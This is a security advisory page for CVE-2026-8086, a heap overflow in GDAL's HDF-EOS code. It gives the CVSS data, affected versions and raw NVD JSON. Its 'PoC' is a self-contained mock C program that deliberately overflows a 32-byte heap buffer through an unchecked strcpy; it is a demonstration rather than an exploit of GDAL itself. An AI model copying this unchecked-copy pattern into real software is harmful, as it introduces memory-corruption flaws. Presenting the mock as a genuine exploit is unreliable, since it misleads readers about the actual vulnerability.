Security Vulnerability Report
CVE-2026-8086 CVSS 5.3 MEDIUM

CVE-2026-8086

Published: 2026-05-07 19:16:03
Last Modified: 2026-05-08 19:04:48

Description

A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:osgeo:gdal:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:osgeo:gdal:3.13.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:osgeo:gdal:3.13.0:beta2:*:*:*:*:*:* - VULNERABLE
OSGeo gdal <= 3.13.0dev-4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Mocking the vulnerable function structure based on the description
// In the real vulnerability, this resides in frmts/hdf4/hdf-eos/SWapi.c
void vulnerable_SWnentries(const char* DimensionName) {
    // Simulating a heap allocation
    char* buffer = (char*)malloc(32);
    if (buffer == NULL) return;

    printf("[+] Processing DimensionName: %s\n", DimensionName);

    // VULNERABILITY: No bounds checking on the input length before copying
    // This leads to a heap-based buffer overflow
    strcpy(buffer, DimensionName);

    printf("[+] Buffer content: %s\n", buffer);
    free(buffer);
}

int main(void) {
    printf("PoC for CVE-2026-8086 - GDAL Heap Overflow\n");
    printf("Triggering overflow in SWnentries via long DimensionName...\n");

    // Create a payload larger than the expected buffer size (e.g., 32 bytes)
    char payload[100];
    memset(payload, 'A', 99);
    payload[99] = '\0'; // Null terminate

    // Call the vulnerable function with the malicious payload
    // This simulates the local attack vector (AV:L)
    vulnerable_SWnentries(payload);

    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8086", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:03.110", "lastModified": "2026-05-08T19:04:48.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": 
"CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.12.4", "matchCriteriaId": "42C34F23-189A-408C-B8DF-A7CD215EDB9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:3.13.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "CBBA367E-AC85-4772-9522-12C10B9794EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:osgeo:gdal:3.13.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "A2E18623-F659-4CD5-8252-3F79C065A8CA"}]}]}], "references": [{"url": "https://github.com/OSGeo/gdal/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/OSGeo/gdal/commit/9491e794f1757f08063ea2f7a274ad2994afa636", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OSGeo/gdal/issues/14356", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/OSGeo/gdal/pull/14361", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https: ... (truncated)